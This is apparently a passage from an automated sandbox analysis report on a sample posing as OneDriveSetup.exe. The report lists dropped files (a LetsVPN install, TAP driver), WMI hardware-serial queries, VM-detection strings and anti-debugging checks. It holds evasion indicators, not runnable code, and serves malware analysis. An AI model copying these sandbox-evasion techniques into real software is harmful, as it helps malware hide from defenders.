                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\runtimes\win-x86\native\e_sqlite3.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.InteropServices.RuntimeInformation.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Reflection.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.FileSystem.DriveInfo.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ComponentModel.TypeConverter.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Tasks.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Toolkit.Uwp.Notifications.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\x86\WebView2Loader.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.Duplex.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.XPath.XDocument.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\DeltaCompressionDotNet.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Tasks.Parallel.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Compression.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Sockets.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Data.SqlClient.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsGoogleAnalytics.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Timer.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ObjectModel.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Extensions.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Ping.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\netstandard.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\DeltaCompressionDotNet.MsDelta.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.provider.dynamic_cdecl.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Data.Odbc.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.ThreadPool.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Dynamic.Runtime.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.Process.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Principal.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\runtimes\win-arm\native\e_sqlite3.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Compression.ZipFile.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\NuGet.Squirrel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLiteNetExtensions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Ports.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Permissions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Data.Common.dllJump to dropped file
                Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{e1a4fd9a-c078-804d-adb0-e99915b985de}\SETEB17.tmpJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\SharpCompress.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.Syndication.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Principal.Windows.dllJump to dropped file
                Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\drivers\SETF101.tmpJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.AppCenter.Analytics.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Encoding.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Csp.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ComponentModel.Annotations.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Squirrel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\x64\WebView2Loader.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Numerics.Vectors.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Globalization.Extensions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.XmlDocument.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.SecureString.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.PerformanceCounter.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.AppCenter.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Linq.Expressions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Serialization.Formatters.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\microsoft.identitymodel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\CommunityToolkit.Mvvm.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Utils.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Win32.Registry.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj49F4.tmp\nsDialogs.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.AppContext.dllJump to dropped file
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{8bbf3398-85b1-894f-af03-707e5cd577b1}\SETE887.tmpJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj49F4.tmp\nsExec.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\driver\tap0901.sysJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Text.Encoding.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Collections.Specialized.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.NetworkInformation.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ComponentModel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsVPNInfraStructure.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Xml.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\MdXaml.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Hardcodet.Wpf.TaskbarNotification.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Memory.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.EventLog.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsVPNDomainModel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\arm64\WebView2Loader.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Serialization.Json.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Web.WebView2.Wpf.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.AccessControl.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\DeltaCompressionDotNet.PatchApi.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.nativelibrary.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Management.Automation.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Reflection.Extensions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\WebSocket4Net.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLite-net.dllJump to dropped file
                Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\drivers\tap0901.sys (copy)Jump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Resources.ResourceManager.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj49F4.tmp\nsProcess.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.ProtectedData.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Newtonsoft.Json.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.AccessControl.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.Debug.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Web.WebView2.Core.dllJump to dropped file
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{8bbf3398-85b1-894f-af03-707e5cd577b1}\tap0901.sys (copy)Jump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Collections.NonGeneric.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Pipes.AccessControl.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsGoogleAnalytics.exeJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.StackTrace.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.ReaderWriter.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.WebSockets.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.UnmanagedMemoryStream.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Text.RegularExpressions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.CodeDom.dllJump to dropped file
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeAPI coverage: 4.1 %
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeAPI coverage: 7.6 %
                Source: C:\Windows\System32\svchost.exe TID: 7840Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 504Thread sleep count: 3694 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 504Thread sleep count: 2176 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5292Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5428Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1684Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe TID: 5924Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe TID: 3860Thread sleep time: -30000s >= -30000s
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe TID: 6204Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe TID: 6208Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe TID: 6208Thread sleep time: -220145s >= -30000s
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe TID: 6252Thread sleep time: -300000s >= -30000s
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BaseBoard
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select SerialNumber From Win32_BIOS
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BIOS
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystemProduct
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
                Source: C:\Users\Public\Videos\bin.exeFile Volume queried: C:\Program Files (x86) FullSizeInformationJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066201D CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathIsDirectoryW,PathFindFileNameW,FindFirstFileW,PathCombineW,FindNextFileW,9_2_0066201D
                Source: C:\Users\Public\Videos\bin.exeCode function: 23_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,23_2_00405C4D
                Source: C:\Users\Public\Videos\bin.exeCode function: 23_2_0040689E FindFirstFileW,FindClose,23_2_0040689E
                Source: C:\Users\Public\Videos\bin.exeCode function: 23_2_00402930 FindFirstFileW,23_2_00402930
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeThread delayed: delay time: 922337203685477
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeThread delayed: delay time: 220145
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeThread delayed: delay time: 300000
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: svchost.exe, 00000006.00000002.3065243285.000002D040265000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: svchost.exe, 00000024.00000003.1851146875.000001BD4D117000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @ethernetwlanppipvmnetextension42}
                Source: svchost.exe, 00000001.00000002.3069561799.000001B0A8E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf
                Source: svchost.exe, 00000006.00000002.3063960251.000002D040213000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                Source: svchost.exe, 00000006.00000002.3065243285.000002D040265000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                Source: OneDriveSetup.exe, 00000000.00000002.1307380542.000001F792CF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3072069532.000001B0AE65C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000006.00000002.3063496536.000002D04020B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                Source: OneDriveSetup.exe, 00000000.00000002.1307380542.000001F792C87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`L
                Source: OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: #VmCi
                Source: svchost.exe, 00000006.00000002.3065243285.000002D040265000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                Source: svchost.exe, 00000006.00000002.3065739926.000002D04029B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                Source: svchost.exe, 00000024.00000003.1849201484.000001BD4D138000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @vmnetextension
                Source: Agghosts.exe, 00000018.00000002.3068680046.0000000001034000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                Source: svchost.exe, 00000006.00000002.3065243285.000002D040265000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                Source: Agghosts.exe, 00000009.00000002.3068916610.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000045.00000002.2063219189.000000000351C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: bin.exe, 00000017.00000003.1591734252.000000000526F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VirtualMachine
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeAPI call chain: ExitProcess graph end nodegraph_9-93583
                Source: C:\Users\Public\Videos\bin.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00661F6E IsDebuggerPresent,OutputDebugStringW,9_2_00661F6E
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_6CEFABFD OutputDebugStringA,GetLastError,9_2_6CEFABFD
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00666F14 GetFileVersionInfoSizeW,GetFileVersionInfoW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcess,VerQueryValueW,VerQueryValueW,VerQueryValueW,RegQueryValueExW,RegCloseKey,9_2_00666F14
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0082045C mov eax, dword ptr fs:[00000030h]9_2_0082045C
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006641DD mov eax, dword ptr fs:[00000030h]9_2_006641DD
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006651C8 mov eax, dword ptr fs:[00000030h]9_2_006651C8
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00666F32 mov eax, dword ptr fs:[00000030h]9_2_00666F32
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_6D116A05 mov eax, dword ptr fs:[00000030h]9_2_6D116A05
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006678A6 GetProcessHeap,HeapAlloc,HeapAlloc,GetAdaptersInfo,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,MultiByteToWideChar,MultiByteToWideChar,StrStrIA,StrStrIA,GetProcessHeap,HeapFree,RegCloseKey,RegEnumKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,RegCloseKey,9_2_006678A6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess token adjusted: Debug
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00661901 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00661901
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_100085E7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_100085E7
